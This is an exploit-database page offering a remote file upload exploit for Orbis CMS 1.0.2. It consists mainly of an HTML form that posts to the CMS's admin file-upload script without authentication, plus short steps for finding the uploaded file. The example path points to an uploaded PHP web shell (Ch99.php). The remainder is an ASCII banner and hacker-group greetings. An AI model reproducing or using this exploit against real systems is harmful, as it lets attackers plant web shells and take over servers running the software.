[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

orbis-1.0.2 Remote File Upload Exploit

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14199
Category
web applications
Date add
26-09-2010
Platform
php
======================================
orbis-1.0.2 Remote File Upload Exploit
======================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor: http://www.novo-ws.com/orbis-cms

# Date: 2010-07-27 

# Author : indoushka 

# Thanks to : Powered by Orbis CMS

# Contact : 00213771818860

# Home : www.sec4ever.net

# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 

<fieldset><legend><img src="img/fileman_unf.png" align="texttop" alt="" /> Upload new file</legend>
    <div class="left">
    <form enctype="multipart/form-data" action="http://127.0.0.1/orbis-1.0.1/admin/fileman_file_upload.php" method="POST">
    <label for="upload">Select file:</label> <span style="font-size:10px;">(max size: <?php echo ini_get('upload_max_filesize'); ?>)</span><br />
    <input name="upload" type="file" class="txt" id="upload" /> 
	<br /><br />
	<input type="submit" name="Submit" value="Upload file" onclick="document.getElementById('upl').style.visibility='visible'" />
	</form>
    </div>
    <div id="upl" class="right"><img src="img/loading.gif" alt="Busy uploading..." /></div> 
    </fieldset>
    <br />
    
Save As .html

you fond your file in the geniral dir

http://127.0.0.1/orbis-1.0.2/uploadsCh99.php

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2024-11-15]  #